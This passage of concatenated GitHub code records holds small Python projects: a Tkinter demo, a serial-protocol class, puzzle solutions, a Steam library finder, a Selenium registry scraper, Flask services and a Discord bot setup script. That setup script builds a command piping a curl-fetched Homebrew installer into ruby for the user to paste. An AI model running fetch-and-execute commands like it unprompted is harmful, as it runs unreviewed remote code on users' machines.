Shao'\n__created__ = '2/24/2015' '1:44 PM'\n\n\ndef find_idx():\n    \"\"\n\nlidx=find_idx(st_ind,end_ind)\ncompress\nsorted(lidx,key=name)\nfname=fidx[0]\nfor f in lidx:\n    fname=f\n    zip=compress(f)\n\n    save_archive(zip)\n\n    upload\n    fetch_archive(zip)\n\n\ndef compress(lf):\n    \"\"\n\ndef decompress(lf):\n    \"\"\n\ndef get_ind(st_ind,end_ind):\n    \"\"\n\n\ndef fetch_archive():\n\n    larc=sorted(larc,key=name)\n    larc=find_range(larc)\n\n    fetch(larc)\n    decompress(larc)\n\n\nif __name__ == '__main__':\n    \"\"\n","repo_name":"yshao/weathergit","sub_path":"031215/fileutils.py","file_name":"fileutils.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"71778793729","text":"import tkinter as tk\r\nt=tk.Tk()\r\nt.title('my home')\r\nt.geometry('200x100')\r\n\r\n\r\n\r\nvar=tk.StringVar()\r\nl=tk.Label(t,textvariable=var,bg='green',font=('Arial',12),width=15,height=2)  # fixed: textvariable (not text) keeps the label bound to the StringVar\r\nl.pack()\r\n\r\n\r\non_hit=False\r\nbutton1 = tk.Button(t)\r\nbutton1[\"text\"]= \"Hello, World!\"\r\nbutton1[\"background\"] = \"green\"\r\nbutton1.pack()\r\ndef hit_me():\r\n    global on_hit\r\n    if on_hit == False:\r\n        var.set('you hit me!')\r\n        on_hit=True\r\n    else:\r\n        on_hit=False\r\n        var.set('')\r\nb=tk.Button(t,text='hit me',width=15,height=2,command=hit_me)\r\nb.pack()\r\nt.mainloop()\r\n","repo_name":"zhoujun-star/Learning-diary","sub_path":"1.Label&Button(标签和按钮).py","file_name":"1.Label&Button(标签和按钮).py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35014539394","text":"__author__ = 'geurt'\n\n\nclass serialMessageException(Exception):\n    pass\n\nclass serialMessageType:\n    ENQ, ACK, NAK = range(3)\n\nclass serialMessageSign:\n    POSITIVE, NEGATIVE = range(2)\n\nclass serialMsg(object):\n    def __init__(self, FromAdress=None, ToAdress=None, Function=None, MsgType=serialMessageType.ENQ):\n        self._FromAdress = None # three positions 001 - 999\n        self._ToAdress = None # three positions 001 - 999\n        self._MsgType = MsgType # ENQ, ACK, NAK\n        self._Function = None # two positions 01 - 99\n        self._Sign = serialMessageSign.POSITIVE\n        self._DecPos = 3 # 0x30 (0, so everything is 0.123), 0x31 (so 1.23), 0x32 (so 12.3), 0x33 (so 123); 48 or 49 or 50\n        self._MsgValue = None # three positions 000 - 999\n        self._IsValid = False\n        if FromAdress is not None:\n            self.FromAdress = FromAdress\n        if ToAdress is not None:\n            self.ToAdress = ToAdress\n        if Function is not None:\n            self.Function = Function\n        # comm details\n        self._SendTime = 0\n        self._Trys = 0\n\n    def serialMsgFromString(self, sString):\n        if len(sString) >= 19:\n            sReadChecksum = sString[16:19]\n            iReadChecksum = int(sReadChecksum)\n            # calculate iChecksum\n            iCalculatedChecksum = 0\n            iPos = 0\n            for cChar in sString:\n                iCalculatedChecksum += ord(cChar)\n                iPos += 1\n                if iPos == 16:\n                    break\n            if iCalculatedChecksum != iReadChecksum:\n                raise serialMessageException(\"Invalid message: checksum mismatch\")\n            else:\n                self._ToAdress = sString[1:4]\n                self._FromAdress = sString[4:7]\n                sMsgType = sString[7:8]\n                #if sMsgType=='\u0005':\n                if ord(sMsgType) == 5:\n                    self._MsgType = serialMessageType.ENQ\n                elif ord(sMsgType) == 6:\n                    self._MsgType = serialMessageType.ACK\n                elif ord(sMsgType) == 21:\n                    self._MsgType = serialMessageType.NAK\n                self._Function = sString[8:10]\n                sSign = sString[10:11]\n                if sSign == \"-\":\n                    self._Sign = serialMessageSign.NEGATIVE\n                else:\n                    self._Sign = serialMessageSign.POSITIVE\n                self._DecPos = sString[11:12]\n                
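# Added note: frame layout, inferred from serialMsgToString below:\n                # [0]=0x00  [1:4]=to  [4:7]=from  [7]=type (ENQ/ACK/NAK)  [8:10]=function\n                # [10]=sign  [11]=decimal position  [12:15]=value  [15]=EOT  [16:19]=checksum  [19]=EOT\n                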
self._MsgValue = sString[12:15]\n self._IsValid = True\n\n def serialMsgToString(self):\n sTmp = chr(0x0)\n if self._ToAdress is not None:\n sTmp += str(self._ToAdress)\n else:\n sTmp += \"000\"\n if self._FromAdress is not None:\n sTmp += str(self._FromAdress)\n else:\n sTmp += \"000\"\n if self._MsgType == serialMessageType.ENQ:\n sTmp += chr(0x05)\n elif self._MsgType == serialMessageType.ACK:\n sTmp += chr(0x06)\n elif self._MsgType == serialMessageType.NAK:\n sTmp += chr(0x15)\n if self._Function is not None:\n sTmp += str(self._Function)\n else:\n sTmp += \"00\"\n if self._Sign == serialMessageSign.POSITIVE:\n sTmp += \"+\"\n else:\n sTmp += \"-\"\n if self._DecPos is not None:\n sTmp += str(self._DecPos)\n else:\n sTmp += \"3\"\n if self._MsgValue is not None:\n sTmp += str(self._MsgValue)\n else:\n sTmp += \"000\"\n sTmp += chr(0x04) # EOT\n\n iChecksum = 0\n for cChar in sTmp:\n iChecksum += ord(cChar)\n sTmp += str(iChecksum)\n sTmp += chr(0x04) # EOT\n return sTmp #TODO, check geen laatste EOT?\n\n # FromAdress\n @property\n def FromAdress(self):\n return self._FromAdress\n\n @FromAdress.setter\n def FromAdress(self, value):\n self._FromAdress = \"%03d\" % (value,)\n\n # ToAdress\n @property\n def ToAdress(self):\n return self._ToAdress\n\n @ToAdress.setter\n def ToAdress(self, value):\n self._ToAdress = \"%03d\" % (value,)\n\n # MsgType\n @property\n def MsgType(self):\n return self._MsgType\n\n @MsgType.setter\n def MsgType(self, value):\n self._MsgType = value\n\n # Function\n @property\n def Function(self):\n return self._Function\n\n @Function.setter\n def Function(self, value):\n self._Function = \"%02d\" % (value,)\n\n # Sign\n @property\n def Sign(self):\n return self._Sign\n\n @Sign.setter\n def Sign(self, value):\n self._Sign = value\n\n # DecPos\n @property\n def DecPos(self):\n return self._DecPos\n\n @DecPos.setter\n def DecPos(self, value):\n self._DecPos = value\n\n # MsgValue\n @property\n def MsgValue(self):\n return self._MsgValue\n\n @MsgValue.setter\n def MsgValue(self, value):\n if isinstance( value, ( int, long ) ):\n self._MsgValue = \"%03d\" % (value,)\n else:\n self._MsgValue = value\n\n # IsValid\n @property\n def IsValid(self):\n return self._IsValid\n\n @IsValid.setter\n def IsValid(self, value):\n self._IsValid = value\n\n # SendTime\n @property\n def SendTime(self):\n return self._SendTime\n\n @SendTime.setter\n def SendTime(self, value):\n self._SendTime = value\n\n # _Retrys\n @property\n def Trys(self):\n return self._Trys\n\n @Trys.setter\n def Trys(self, value):\n self._Trys = value","repo_name":"geurtlagemaat/bliknetlib","sub_path":"src/bliknetlib/serialMsg.py","file_name":"serialMsg.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"31298129418","text":"from collections import deque\n\ndef isThereBig(que, n):\n for q in que:\n k, v = q[0], q[1]\n if n < v:\n return True\n \n return False\n\ndef solution(priorities, location):\n answer = []\n queue = deque()\n idx = 0\n for p in priorities:\n queue.append([idx, p])\n idx += 1\n\n while queue:\n front = queue.popleft()\n\n if isThereBig(queue, front[1]):\n queue.append(front)\n else:\n answer.append(front)\n\n for i, ans in enumerate(answer):\n k, v = ans[0], ans[1]\n if k == location:\n return i+1\n\nprior = [1, 1, 9, 1, 1, 1]\nloc = 0\ns = solution(prior, 
loc)\nprint(s)","repo_name":"star6973/algorithm-practice","sub_path":"Programmers/solved/프린터.py","file_name":"프린터.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"38388143713","text":"'''\nCreated on Apr 24, 2019\n\n@author: PITA\n'''\nfrom Package import GetInput, Retea\nimport numpy\nlimita = 0.5\ndef tipareste(x):\n    lst=[]\n    for it in range(len(x)):\n        for jt in range(len(x[it])):\n            if x[it][jt] not in lst:\n                lst.append(x[it][jt])\n    lst.sort()\n    print(lst) \ndef analizeazaPoza(poza):\n    import cv2\n    pixeli = GetInput.prelucreazaImagineInput(poza)\n    image = cv2.imread(poza)\n    model = Retea.getModel()\n    pred = model.predict(numpy.array([pixeli]))\n    suma = 0\n    cnt = 0\n    for it in range(len(pred[0])):\n        \n        for jt in range(len(pred[0][it])):\n            \n            if pred[0][it][jt]>limita:\n                suma +=pred[0][it][jt]\n                cnt +=1\n    medie = (float(suma)/float(cnt))\n    for it in range(len(pred[0])):\n        for jt in range(len(pred[0][it])):\n            if pred[0][it][jt]>medie: \n                cv2.circle(image,(it*4,jt*4), 3, (0,0,255), -1)\n    tipareste(pred)\n    cv2.imshow(\"IataCarii\", image)\n    cv2.waitKey(0)\n    print(medie)\n    print(pred.shape)\n    print(pred)\n    \n    \n#analizeazaPoza(r\"C:\\Users\\PITA\\git\\licenta2019\\Radiografii_DB\\PHOTO-2019-04-24-14-12-50.jpg\")","repo_name":"nCiss/licenta2019","sub_path":"licenta2019/Package/MainScript.py","file_name":"MainScript.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"73405398849","text":"# Definition for singly-linked list.\nclass ListNode(object):\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\nclass Solution(object):\n    \n    \n    \n    def addTwoNumbers(self, l1, l2):\n        \n        \"\"\"\n        :type l1: ListNode\n        :type l2: ListNode\n        :rtype: ListNode\n        \"\"\"\n        first_sum = self.get_sum(l1)\n        second_sum = self.get_sum(l2)\n        total = first_sum + second_sum\n        root = ListNode(0)\n        dummy_front = root\n        \n        while total >= 10:\n            # fixed: peel off the lowest digit and shrink total, so the loop terminates\n            total, last_digit = divmod(total, 10)\n            dummy_front.next = ListNode(last_digit)\n            dummy_front = dummy_front.next\n        dummy_front.next = ListNode(total)\n        return root.next\n    \n    def get_sum(self, listNode):\n        sum = 0\n        pos = 1\n        while listNode:\n            # fixed: include the head node and advance the pointer (was an infinite loop)\n            sum += pos * listNode.val\n            pos *= 10\n            listNode = listNode.next\n        return sum\n\n\n    \n    \n","repo_name":"Ashok96/LeetCodeProblem2","sub_path":"leetcod2(timelimit).py","file_name":"leetcod2(timelimit).py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11303311088","text":"import platform\nimport os\nimport cogs.hs.setuplangs\n\nbrewinstallmacos = \"\"\"/usr/bin/ruby -e \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)\" && \"\"\"\npresetregmacos = \"pip3 install discord.py[voice]\"\npresetoptmacos = \" && brew install ffmpeg\"\n\npresetoptlinux = \" && sudo apt-get install libopus0 && sudo apt-get install ffmpeg\"\npresetreglinux = \"pip3 install discord.py[voice] && sudo apt-get install libffi-devel\"\n\npresetregwindows = \"pip3 install discord.py[voice]\"\n\n
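\n# Added note (derived from the presets above): e.g. the full macOS path without\n# Homebrew present composes the Homebrew installer one-liner followed by\n# \"pip3 install discord.py[voice] && brew install ffmpeg\".\n\nprint(\"Setup-Script shipped with JeffNationBot. 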
Installs all dependencies and sets up python for an easy start.\\n PLEASE PROVIDE CREDIT WITHIN THE HELP PAGE WITH AN LINK TO OUR GITHUB REPO!\")\nos = platform.system()\n\nprint(\"What language do you want to use?/Welche Sprache möchtest du nutzen?\\n0: English, 1: Deutsch\")\nchoice1 = input(\"Select Language: \")\nchoice1 = int(choice1)\n\nif choice1>1:\n print(\"Wrong language configured! Assuming english...\")\n choice1=0\n\nprint(cogs.hs.setuplangs.welcome1[choice1])\nprint(cogs.hs.setuplangs.welcome2[choice1])\nif os==\"Linux\":\n print(cogs.hs.setuplangs.detect[choice1].format(\"Linux\"))\n det = 1\nelif os==\"Darwin\":\n print(cogs.hs.setuplangs.detect[choice1].format(\"MacOS\"))\n det = 2\nelif os==\"Windows\":\n print(cogs.hs.setuplangs.detect[choice1].format(\"Windows\"))\n det = 3\n\n\ndef Linux():\n print(cogs.hs.setuplangs.dtlinux[choice1])\n installation = input(cogs.hs.setuplangs.dtaccept[choice1])\n installation = int(installation)\n if installation == 0 or installation > 3:\n print(\"Out of range!\")\n exit(2)\n else:\n if installation == 1:\n output = presetreglinux + presetoptlinux\n elif installation == 2:\n output = presetreglinux\n elif installation == 3:\n print(\"Aborted by user!\")\n exit(0)\n\n print(\"-----------------------------------\")\n print(output)\n print(\"-----------------------------------\\n\", cogs.hs.setuplangs.copypaste[choice1],\n \"\\n-----------------------------------\")\n done = input(cogs.hs.setuplangs.executesucc[choice1])\n\n if done == \"y\":\n print(cogs.hs.setuplangs.grttoken[choice1])\n tokengen()\n if done == \"n\":\n print(cogs.hs.setuplangs.commanderror[choice1])\n else:\n print(\"Invalid input!\")\n exit(1)\n\n\ndef MacOS():\n macbrew = input(cogs.hs.setuplangs.dtmacospre[choice1] + \" \")\n if macbrew==\"y\":\n mcbr = 0\n elif macbrew==\"n\":\n mcbr = 1\n else:\n print(\"Illegal input!\")\n exit(1)\n\n print(cogs.hs.setuplangs.dtmacos[choice1])\n installation = input(cogs.hs.setuplangs.dtaccept[choice1])\n installation = int(installation)\n if installation==0 or installation>3:\n print(\"Out of range!\")\n exit(2)\n else:\n if installation==1:\n output = presetregmacos + presetoptmacos\n elif installation==2:\n output = presetregmacos\n elif installation==3:\n print(\"Aborted by user!\")\n exit(0)\n\n if mcbr==1:\n output = brewinstallmacos + output\n else:\n output = output\n print(\"-----------------------------------\")\n print(output)\n print(\"-----------------------------------\\n\", cogs.hs.setuplangs.copypaste[choice1], \"\\n-----------------------------------\")\n done = input(cogs.hs.setuplangs.executesucc[choice1])\n\n if done==\"y\":\n print(cogs.hs.setuplangs.grttoken[choice1])\n tokengen()\n if done==\"n\":\n print(cogs.hs.setuplangs.commanderror[choice1])\n else:\n print(\"Invalid input!\")\n exit(1)\n\n\n\n\n\ndef Windows():\n print(cogs.hs.setuplangs.dtlinux[choice1])\n installation = input(cogs.hs.setuplangs.dtaccept[choice1])\n installation = int(installation)\n if installation == 0 or installation > 3:\n print(\"Out of range!\")\n exit(2)\n else:\n if installation == 1:\n input(cogs.hs.setuplangs.windowsffmpeg[choice1])\n output = presetregwindows\n elif installation == 2:\n output = presetreglinux\n elif installation == 3:\n print(\"Aborted by user!\")\n exit(0)\n\n print(\"-----------------------------------\")\n print(output)\n print(\"-----------------------------------\\n\", cogs.hs.setuplangs.copypaste[choice1],\n \"\\n-----------------------------------\")\n done = 
input(cogs.hs.setuplangs.executesucc[choice1])\n\n if done == \"y\":\n print(cogs.hs.setuplangs.grttoken[choice1])\n tokengen()\n if done == \"n\":\n print(cogs.hs.setuplangs.commanderror[choice1])\n else:\n print(\"Invalid input!\")\n exit(1)\n\n\ndef tokengen():\n print(cogs.hs.setuplangs.entertoken[choice1])\n token = input()\n print(cogs.hs.setuplangs.createfile[choice1])\n f = open('modules/token.py', 'w')\n f.write(\"\"\"def gettoken():\\n token = \"{}\"\\n return token\"\"\".format(token))\n f.close()\n print(cogs.hs.setuplangs.done[choice1])\n print(cogs.hs.setuplangs.runb[choice1], \"\\n python3 main.py\")\n exit(10)\n\n\nif det==1:\n Linux()\nelif det==2:\n MacOS()\nelif det==3:\n Windows()\n","repo_name":"p8tgames/jeffnation-bot.py","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"41331724598","text":"from flask import current_app, jsonify\nfrom flask_jwt_extended import create_access_token, get_current_user\nimport requests\nfrom app.main.models.user import User, FollowerRelationship\nfrom app.main.models.poll import Poll\nfrom app.main import db\n\ndef save_new_user(data):\n try:\n access_token = data['accessToken']\n\n debug_token_request = requests.get(\n current_app.config['DEBUG_TOKEN_URL'].format(access_token=access_token))\n\n debug_token_json = debug_token_request.json()\n user_id = debug_token_json['data']['user_id']\n\n user = User.query.filter_by(fb_id=user_id).first()\n # if user exists, just return new JWT\n if user:\n jwt = create_access_token(user.id, expires_delta=False)\n return dict(token=jwt), 201\n\n user_details_request = requests.get(\n url=current_app.config['USER_DETAIL_URL'].format(access_token=access_token, user_id=user_id)\n )\n\n user_detail_json = user_details_request.json()\n\n name = user_detail_json['name']\n email = None if 'email' not in user_detail_json else user_detail_json['email']\n fb_id = user_detail_json['id']\n\n user = User(fb_id=fb_id, name=name, email=email)\n\n db.session.add(user)\n db.session.commit()\n\n jwt = create_access_token(user.id)\n return dict(token=jwt, expires_delta=False), 201\n\n except Exception as e:\n raise ValueError(e)\n response_object = {\n 'status': 'error',\n 'message': 'Internal Error'\n }\n\n return response_object, 500\n\ndef get_all_users():\n user = get_current_user()\n users_and_relationship = db.session \\\n .query(User.id, User.email, User.name, User.fb_id, FollowerRelationship.relationship_status) \\\n .outerjoin(FollowerRelationship, FollowerRelationship.follower_id == User.id) \\\n .filter(User.id != user.id) \\\n .all()\n\n return [u._asdict() for u in users_and_relationship], 200\n\ndef create_user_follow_request(data):\n user_requested_id = data['id']\n\n current_user = get_current_user()\n user_to_request = User.query.filter_by(id=user_requested_id).first()\n\n current_user.followers.append(user_to_request)\n db.session.add(current_user)\n db.session.commit()\n\n response_object = {\n 'status': 'success'\n }\n\n return response_object, 201\n\ndef confirm_user_follow_request(data):\n following_id = data['id']\n current_user = get_current_user()\n\n follow_request = db.session.query(FollowerRelationship) \\\n .filter_by(user_id=following_id, follower_id=current_user.id).first()\n\n follow_request.relationship_status = \"accepted\"\n db.session.add(follow_request)\n\n polls_following = Poll.query.filter_by(owner_id=following_id).all()\n user = 
User.query.filter_by(id=current_user.id).first()\n user.polls_following.extend(polls_following)\n db.session.add(user)\n\n db.session.commit()\n\n response_object = {\n 'status': 'success'\n }\n\n return response_object, 201\n\ndef get_a_user(public_id):\n user = db.session.query(User.id, User.email, User.fb_id, User.name) \\\n .filter(User.id == public_id) \\\n .first()\n response = user._asdict()\n return response, 200\n\ndef get_user_subscribers():\n current_user = get_current_user()\n #right now just getting followers name and id\n mysubscribers = db.session.query(User.name, FollowerRelationship.follower_id )\\\n .outerjoin(FollowerRelationship,FollowerRelationship.follower_id == User.id)\\\n .filter(FollowerRelationship.user_id == current_user.id)\\\n .filter(FollowerRelationship.relationship_status == \"accepted\")\\\n .all()\n return [u._asdict() for u in mysubscribers], 200\n\ndef get_user_subscribedto():\n\n current_user = get_current_user()\n\n subscribedto = db.session.query(User.name, FollowerRelationship.user_id )\\\n .outerjoin(FollowerRelationship,FollowerRelationship.user_id == User.id)\\\n .filter(FollowerRelationship.follower_id == current_user.id)\\\n .filter(FollowerRelationship.relationship_status == \"accepted\")\\\n .all()\n return [u._asdict() for u in subscribedto], 200\n\ndef get_invited_by_users(user_id):\n\n invited_by = db.session.query(User.name, FollowerRelationship.user_id )\\\n .outerjoin(FollowerRelationship,FollowerRelationship.user_id == User.id)\\\n .filter(FollowerRelationship.follower_id == user_id)\\\n .filter(FollowerRelationship.relationship_status == \"pending\")\\\n .all()\n return [u._asdict() for u in invited_by], 200\n","repo_name":"JeffreyQ/UCLA-CS-130","sub_path":"backend/app/main/service/user_service.py","file_name":"user_service.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"23814019579","text":"# -*- encoding: utf-8 -*-\n\n# Code greatly inspired by https://github.com/LostDragonist/steam-library-setup-tool\n\nimport os\nimport winreg # type: ignore\n\nfrom pathlib import Path\nfrom typing import Dict\n\n\nclass SteamGame:\n def __init__(self, appid, installdir):\n self.appid = appid\n self.installdir = installdir\n\n def __repr__(self):\n return str(self)\n\n def __str__(self):\n return \"{} ({})\".format(self.appid, self.installdir)\n\n\nclass LibraryFolder:\n def __init__(self, path: str):\n self.path = path\n\n self.games = []\n for filename in os.listdir(os.path.join(path, \"steamapps\")):\n if filename.startswith(\"appmanifest\"):\n with open(\n os.path.join(path, \"steamapps\", filename), \"r\", encoding=\"utf-8\"\n ) as fp:\n i, n = None, None\n for line in fp:\n line = line.strip()\n\n if line.startswith('\"appid\"'):\n i = line.replace('\"appid\"', \"\").strip()[1:-1]\n if line.startswith('\"installdir\"'):\n n = line.replace('\"installdir\"', \"\").strip()[1:-1]\n\n if i is not None and n is not None:\n break\n if i is None or n is None:\n continue\n self.games.append(SteamGame(i, n))\n\n def __repr__(self):\n return str(self)\n\n def __str__(self):\n return \"LibraryFolder at {}: {}\".format(self.path, self.games)\n\n\ndef parse_library_info(library_vdf_path):\n\n library_folders = []\n\n with open(library_vdf_path, \"r\") as f:\n\n # Find the line containing \"LibraryFolders\" (quoted):\n it = iter(f)\n for line in it:\n\n line = line.strip().strip('\"')\n if line == \"LibraryFolders\":\n break\n\n # Find the opening 
{:\n for line in it:\n if line.strip() == \"{\":\n break\n\n # Read the folders:\n for line in it:\n line = line.strip()\n if line == \"}\":\n break\n\n # Strip \" on each side and split, we should get\n # 3 parts with an empty middle\n parts = line.strip('\"').split('\"')\n\n if len(parts) == 3 and not parts[1].strip():\n try:\n int(parts[0].strip())\n except ValueError:\n continue\n\n try:\n library_folders.append(\n LibraryFolder(parts[2].strip().replace(\"\\\\\\\\\", \"\\\\\"))\n )\n except (FileNotFoundError, ValueError):\n continue\n\n return library_folders\n\n\ndef find_games() -> Dict[str, Path]:\n try:\n with winreg.OpenKey(winreg.HKEY_CURRENT_USER, \"Software\\\\Valve\\\\Steam\") as key:\n value = winreg.QueryValueEx(key, \"SteamExe\")\n steam_path = value[0].replace(\"/\", \"\\\\\")\n except FileNotFoundError:\n return {}\n\n library_vdf_path = os.path.join(\n os.path.dirname(steam_path), \"steamapps\", \"libraryfolders.vdf\"\n )\n\n library_folders = parse_library_info(library_vdf_path)\n library_folders.append(LibraryFolder(os.path.dirname(steam_path)))\n\n games: Dict[str, Path] = {}\n for library in library_folders:\n for game in library.games:\n games[game.appid] = Path(library.path).joinpath(\n \"steamapps\", \"common\", game.installdir\n )\n\n return games\n\n\nif __name__ == \"__main__\":\n games = find_games()\n for k, v in games.items():\n print(\"Found game with id {} at {}.\".format(k, v))\n","repo_name":"Yoosk/modorganizer-basic_games","sub_path":"steam_utils.py","file_name":"steam_utils.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"22015415552","text":"#! /usr/bin/env python\n\"\"\"\nshuffle rows of a big file, rewrite to a new file\n\"\"\"\nimport argparse\nimport os\nimport gc\nimport numpy as np\n\n\ndef str2bool(v):\n # susendberg's function\n return v.lower() in (\"yes\", \"true\", \"t\", \"1\")\n\n\ndef count_line_num(sl_filepath, fheader=True):\n count = 0\n with open(sl_filepath, 'r') as rf:\n if fheader:\n next(rf)\n for line in rf:\n count += 1\n print('done count the lines of file..')\n return count\n\n\ndef read_one_shuffle_info(filepath, shuffle_lines_num, total_lines_num, checked_lines_num, isheader):\n with open(filepath, 'r') as rf:\n if isheader:\n next(rf)\n count = 0\n while count < checked_lines_num:\n next(rf)\n count += 1\n\n count = 0\n lines_info = []\n lines_num = min(shuffle_lines_num, (total_lines_num - checked_lines_num))\n for line in rf:\n if count < lines_num:\n lines_info.append(line.strip())\n count += 1\n else:\n break\n print('done reading file {}'.format(filepath))\n return lines_info\n\n\ndef shuffle_samples(samples_info):\n mark = list(range(len(samples_info)))\n np.random.shuffle(mark)\n shuffled_samples = []\n for i in mark:\n shuffled_samples.append(samples_info[i])\n return shuffled_samples\n\n\ndef write_to_one_file_append(features_info, wfilepath):\n with open(wfilepath, 'a') as wf:\n for i in range(0, len(features_info)):\n wf.write(features_info[i] + '\\n')\n print('done writing features info to {}'.format(wfilepath))\n\n\ndef caoncat_two_files(file1, file2, shuffle_lines_num, lines_num, concated_fp, isheader):\n open(concated_fp, 'w').close()\n\n if isheader:\n rf1 = open(file1, 'r')\n wf = open(concated_fp, 'a')\n wf.write(next(rf1))\n wf.close()\n rf1.close()\n\n f1line_count = count_line_num(file1, isheader)\n f2line_count = count_line_num(file2, False)\n\n line_ratio = float(f2line_count) / f1line_count\n 
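# Added note (illustrative): scale file2's chunk so both halves are consumed in\n    # about the same number of rounds; e.g. 900 vs 3000 lines with a 300-line chunk\n    # gives round(0.3*300)+1 = 91 lines per round from file2 (+1 avoids a zero chunk).\n    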
shuffle_lines_num2 = round(line_ratio * shuffle_lines_num) + 1\n\n checked_lines_num1, checked_lines_num2 = 0, 0\n while checked_lines_num1 < lines_num or checked_lines_num2 < lines_num:\n file1_info = read_one_shuffle_info(file1, shuffle_lines_num, lines_num, checked_lines_num1, isheader)\n checked_lines_num1 += len(file1_info)\n file2_info = read_one_shuffle_info(file2, shuffle_lines_num2, lines_num, checked_lines_num2, False)\n checked_lines_num2 += len(file2_info)\n if len(file1_info) == 0 and len(file2_info) == 0:\n break\n samples_info = shuffle_samples(file1_info + file2_info)\n write_to_one_file_append(samples_info, concated_fp)\n\n del file1_info\n del file2_info\n del samples_info\n gc.collect()\n\n\ndef split_a_file_to_two_parts(filepath, header, temp_dir):\n filename = os.path.basename(filepath)\n\n f_linenum = count_line_num(filepath, header)\n head_num = int(f_linenum / 2)\n tail_num = f_linenum - head_num\n\n head_file_path = \"/\".join([temp_dir, filename + '.head.tmp'])\n tail_file_path = \"/\".join([temp_dir, filename + '.tail.tmp'])\n\n os.system('head -n ' + str(head_num) + ' ' + filepath + ' > ' + head_file_path)\n os.system('tail -n ' + str(tail_num) + ' ' + filepath + ' > ' + tail_file_path)\n\n return head_file_path, tail_file_path\n\n\ndef main():\n parser = argparse.ArgumentParser(description='shuffle rows of a LINE file. '\n 'The file must have no header')\n parser.add_argument('--fp', type=str, required=True,\n help='file path to be reshuffle')\n\n parser.add_argument('--num_samples_per_file', type=int, default=2000000000, required=False,\n help='num of samples per file, default 2000000000 (equal to Inf)')\n parser.add_argument('--num_lines_shuffle', type=int, default=3000000, required=False,\n help='num of lines for one shuffle, default 2000000')\n parser.add_argument('--header', type=str, default='no', required=False,\n help='whether there are headers in fp or not, this arg is DEPRECATED')\n parser.add_argument('--temp_dir', type=str, default=\"/tmp\",\n required=False, help=\"temp directory for saving temp files, default /tmp\")\n args = parser.parse_args()\n\n ori_fp = args.fp\n linenum = args.num_samples_per_file\n oneshufflenum = args.num_lines_shuffle\n\n header = str2bool(args.header)\n header = False\n\n temp_dir = args.temp_dir\n\n fname, fext = os.path.splitext(ori_fp)\n shuffled_file = fname + '.shuffle' + fext\n head_file_path, tail_file_path = split_a_file_to_two_parts(ori_fp, header, temp_dir)\n caoncat_two_files(head_file_path, tail_file_path, oneshufflenum, linenum, shuffled_file, header)\n\n os.remove(head_file_path)\n os.remove(tail_file_path)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"bioinfomaticsCSU/deepsignal","sub_path":"scripts/shuffle_a_big_file.py","file_name":"shuffle_a_big_file.py","file_ext":"py","file_size_in_byte":5009,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"43"} +{"seq_id":"37856744939","text":"from selenium import webdriver\nimport time\n\nclass Montana_Bot():\n def __init__(self, entity_name, chromedriver_location):\n self.entity_name = entity_name\n self.chromedriver_location = chromedriver_location\n\n def initializeSelenium(self, chromedriver_location):\n # calls createUrlFromName with input\n url = \"https://www.mtsosfilings.gov/mtsos-master/service/create.html?service=registerItemSearch\"\n\n # starts Selenium\n driver = webdriver.Chrome(executable_path=chromedriver_location)\n\n # get URL\n driver.get(url)\n\n return driver\n\n def findDetailsPage(self, 
driver, entity_name):\n # inputs information to search\n text = driver.find_element_by_xpath('//*[@id=\"QueryString\"]')\n text.send_keys(entity_name)\n temp = driver.find_elements_by_class_name('appReceiveFocus')\n submit = temp[2]\n submit.click()\n return driver\n\n def scrapeData(self, driver, fullDict):\n # finds and navigates to the link for the first entity\n time.sleep(4)\n temp = driver.find_elements_by_class_name('appReceiveFocus')\n link = temp[3]\n link.click()\n\n # assigns strings to keys and values for the dictionary depending on their position on the page\n keys = driver.find_elements_by_class_name('appAttrLabel')\n values = driver.find_elements_by_class_name('appAttrValue')\n for i in range(len(keys)):\n if keys[i].text == '':\n fullDict['Information']['Name'] = values[i].text\n elif keys[i].text.lower() == 'name':\n pass\n else:\n fullDict['Information'][keys[i].text] = values[i].text\n\n driver.quit()\n return fullDict\n\n def run_script(self):\n entity_name = self.entity_name\n chromedriver_location = self.chromedriver_location\n driver = self.initializeSelenium(chromedriver_location)\n fullDict = {\n 'Information': {}\n }\n driver = self.findDetailsPage(driver, entity_name)\n driver.implicitly_wait(3)\n return self.scrapeData(driver, fullDict)","repo_name":"jordanjhoff/Deepblocks-code","sub_path":"States/Montana/MT_scraper.py","file_name":"MT_scraper.py","file_ext":"py","file_size_in_byte":2148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"42638195763","text":"from flask import Flask, render_template, request\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, DateField, IntegerField, DecimalField, SelectField\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = 'YOUR_SECRET_KEY'\n\nclass BasicForm(FlaskForm):\n first_name = StringField('First Name')\n last_name = StringField('Last Name')\n date = DateField('DOB (D-M-Y)',format='%d-%m-%Y')\n Integer = IntegerField('Favouriate number')\n Float = DecimalField('choose a decimal from 0-1')\n Select = SelectField('Gender', choices=[(' '), ('Male'), ('Female')])\n submit = 